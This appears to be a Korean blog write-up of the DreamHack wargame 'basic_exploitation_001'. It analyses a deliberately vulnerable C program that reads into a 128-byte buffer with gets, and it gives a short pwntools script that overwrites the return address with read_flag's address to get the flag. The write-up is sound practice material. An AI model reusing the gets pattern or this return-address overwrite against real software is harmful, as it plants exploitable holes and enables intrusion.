DreamHack - basic_exploitation_001 풀이

 

checksec으로 파일 보호 기법들 확인

 

NX(No-eXecute) 보호 기법이 활성화되어 있으므로, 쉘 코드는 실행되지 않지만, Stack Canary가 활성화되지 않은 것으로 보아 Return Address Overwrite에 취약하다는 것을 알 수 있다. 

 

 

basic_exploitation_001.c 분석

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    gets(buf);

    return 0;
}

문제에서 제공하는 소스 파일을 보면

사용자로부터 0x80(128 바이트) 사이즈 만큼 할당된 buf 변수에다 gets 함수로 입력을 받는다. 

read_flag()라는 플래그 파일을 읽는 함수가 존재하는데 main 함수에서 호출하지 않고 있다. 

 

128 바이트 크기 buf + SFP (4 바이트) + RET (4 바이트)에 따라서 buf는 '\90'을 132개를 채우고 나머지 4바이트는 read_flag 함수의 위치를 적어주면 main 함수가 끝날 때 원하는 위치로 이동을 할 수 있다. 

 

gdb로 read_flag() 주소 찾기

 

gdb로 실행 파일의 함수 이름과 그 함수의 주소를 찾기 위해서는 info functions를 입력하면 된다. 

 

read_flag 주소는 "0x080485b9"이다. 

 

 

pwntools로 페이로드 작성

위 정보를 토대로 페이로드를 생성해 드림핵의 서버로 전송하여 플래그를 읽는 파이썬 코드를 작성해보았다. 

 

from pwn import *

rem = remote('host2.dreamhack.games', 17814)

payload = b"\x90"*132
payload += p32(0x080485B9)

rem.sendline(payload)
rem.interactive()

 

payload = b"\x90" * 132 <- \x90(NOP: No Operation)으로 132 바이트를 채움

payload += p32(0x080485B9) <- p32는 32bit little endian으로 packing 하는 함수이다. 

 

 

참고: 

https://lclang.tistory.com/90

Pwntools 기본적인 사용법 - 2

 

 

FLAG 획득

 

작성한 파일을 실행하게 되면 플래그 획득에 성공하게 된다.